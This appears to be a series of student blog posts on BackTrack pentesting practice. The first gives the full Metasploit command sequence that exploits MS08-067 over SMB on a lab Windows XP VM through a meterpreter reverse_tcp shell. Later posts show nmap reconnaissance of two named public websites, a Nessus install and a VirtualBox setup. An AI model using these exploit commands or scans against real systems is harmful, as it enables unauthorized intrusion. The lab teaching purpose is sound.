How to exploit Port 445 SMB using Metasploit

On this post I will try to do exploitation on port 445 (SMB) using Metasploit on Backtrack R2 ..
First we need to know information about victim, in penetration testing know as Informaton Gathering, we can use nmap, Zenmap or ect to scanning candidate victim on network.

Then we do scanning Vulnerability Assesment on the target IP 192.168.56.101 , I use Nessus to do it. 

In the scan above ,We can see vulnerability of victim is have 2 high risk vulnerability, press on port 445 and look deeply information like this

I look 2 vulnerability In the scan above and choose a 2nd plugin I have, Plugin name is MS08-067, I try to find information about that plugin vulnerability on google and find at metasploit payload description, and try to exploit it, and next open metasploit console with command on terminal #msfconsole 

Use exploit match with nessus result and syntax in metasploit is

use exploit/windows/smb/ms08_067_netapi

After choose exploit we need to set payload with syntax

set PAYLOAD windows/meterpreter/reverse_tcp

After set Payload we need to determine Local Host and target use syntax

set LHOST 192.168.56.102 -------------------------------------> My IP

set RHOST 192.168.56.101 -------------------------------------> Target IP

and execute Exploit with syntax

exploit

To enter meterpreter mode

After we on meterpreter mode its mean we has make hole to taget system with payload we used, now we need to enter C:\ on system32 to full takedown target system

use syntax

 

meterpreter > execute -f -f cmd.exe -M -i

This command mean we make system execute command prompth on system (XP) and after that we enter to system32 target

From the above we can see that Windows XP SP3 is in virtualbox been hacked, by going to the command prompt windows applications. 
Furthermore, to prove that I have really got into the windows system, I will create a new folder named "PANJI_IS2C"

Congrats, We have succes to exploit Windows using METASPLOIT...

How to install Nessus in bactrack 5 R2

In the post this time I would like to explain how to install Nessus in the first Backtrack.Yang Download Nessus in http://www.nessus.org/register/ first program. After registering and downloading our application, we can directly install the package in the following manner:
Open a terminal and type the following command, do not forget to point our first location to the location where we download Nessus.

root@bt:~# dpkg -i Nessus-5.0.1-debian6_i386.deb
Selecting previously deselected package nessus.
(Reading database ... 252456 files and directories currently installed.)
Unpacking nessus (from Nessus-5.0.1-debian6_i386.deb) ...
Setting up nessus (5.0.1) ...

 - You can start nessusd by typing /etc/init.d/nessusd start
 - Then go to https://bt:8834/ to configure your scanner


Processing triggers for ureadahead ...

Information Gathering in www.spentera.com

In this post, I will discuss about the tracking information www.spentera.com site, the tracking, I use two methods: active and passive .. 

The First, the Active, I use a tool called nmap.
Nmap (“Network Mapper”) is an open source tool for network exploration and security auditing. It was designed to rapidly scan large networks,although it works fine against single hosts.

From the above display, visible PORT positions are open and locked , which port 80 and 8080 Open and port 443,8443 are closed.

From the above display, Increase verbosity level and number of the selected port and host.

On view below, it appears the name of the device and the operating system .

From the above display, ScanPBNJ performs an Nmap scan and then stores the results in a database. The ScanPBNJ stores information about the machine that has been scanned. ScanPBNJ stores the IP Address, Operating System,Hostname and a localhost bit.

The second is a passive way, as follows:

As I know Spentera is Security Consulting

The Information Security Consulting service was established to address the growing need for organizations to understand and manage security at a higher level and "talking techie" where appropriate.

Security Audit

Security audit helps clients evaluate their current security positions and implement suggested improvements before security gaps can become security breaches.

Penetration Testing

Spentera validates the control and implementation of existing security and risk measures by performing demonstrations of activities that are unknown in the networks, systems and attacks on application as part of a security testing in a safe and controlled manner.

Vulnerability Assessment

Spentera's Vulnerability Assessment Service can assist you in identifying the vulnerability of networks and information you have, by doing that, you can prevent attacks that may be made against such vulnerabilities.

Digital Forensics

Spentera digital forensics team perform the analysis based on various objectives, such as, discovery of perpetrator location, their identification and damaged instances which may involve different technologies like servers, laptops, portable media, mobile phones and backup devices.

Information Gathering in is2c-dojo.com

In my post this time, I will discuss about the tracking information http://is2c-dojo.com site, the tracking, I use two methods: active and passive .. 

The First, the Active, I use a tool called nmap.
Nmap (“Network Mapper”) is an open source tool for network exploration and security auditing. It was designed to rapidly scan large networks,although it works fine against single hosts.
  

From the above display, visible PORT positions are open and locked , which port 80 and 8080 Open and port 443,8443 are closed.

On view below, it appears the name of the device and the operating system  .

The second is a passive way, namely as follows: 
 

In the display above shows that the site is2c-dojo.com  is indexed and listed in Google, on the other hand IS2C is a course that discusses Digital forensics and managed by Mr. Mada & team. 

In some other sites I also saw activity pack mada in filling IT Seminar, especially Digital forensics, where the seminar is filled by Mr. mada also been published courses on IS2C.

How to install virtualbox and 'OS' in Backtrack R2

The first, download and install the program VirtualBox. The use of virtual learning box pentest using BackTrack 5 would greatly help us to train our skills-skills before pentest pentest world of reality. Therefore, we must first install Virtual box on our BackTrack. But now the problem if we use the direct download with apt-get install virtualbox-4.0 then during execution vbox will be erorr. So go through the following steps that I will mention.
The reason why there is erorr during execution Vbox is because the kernel headers installed on BackTrack 5 has therefore we must install it first. Type the following code in the terminal

• root@bt:~# prepare-kernel-sources
• root@bt:~# cd /usr/src/linux
• root@bt:/usr/src/linux# cp -rf include/generated/* include/linux/ 

Then edit the sources.list file and add the repository Vbox by typing the following command:

• root@bt:/usr/src/linux# echo deb http://download.virtualbox.org/virtualbox/debian lucid contrib

Then download virtualbox package by typing the following command:

• root@bt:/usr/src/linux# wget -q http://download.virtualbox.org/virtualbox/debian/oracle_vbox.asc -O- | sudo apt-key add -

 Then do the update by typing the following command:

• root@bt:/usr/src/linux# apt-get update

• root@bt:/usr/src/linux# apt-cache search virtualbox 

 Then do a virtual box installation by typing the following command:

• root@bt:/usr/src/linux# apt-get install virtualbox-4.2

 

Congratulations Now virtual box installed ..

 Second, install the operating system already installed on virtualbox on Backtrack. In this example I take the operating system Windows XP SP3, Here's how to set it up :
  
Open the virtual box  :

 

Specify the name of the system to be installed, and click "next"

At this stage we need to determine value of memory RAM to use at system and click "next"

 At this stage choose as default is"Create New Hardisk"

Choose "VDI" to determine type of Hardisk on Virtualbox

Choose as default is "Dynamically Allocated"

Determine size of hardisk virtual, the amount depends on the system capacity will be installed

 This is final step to prepare vitual disk to install other system in this case I install Windows XP SP3, This screenshoot when i try to install Windows in vBox :

 Press F8 when this dialog appear

 Congrats, In this screen we have Instaled Windows XP SP3 in VirtualBox

After a successful windows operating system we install, configure the network so that the machine is installed virtualbox windows can ping Our Laptop(My OS is Ubuntu)like this Picture 

Now We can connect from Machine virtualbox to Our Laptop...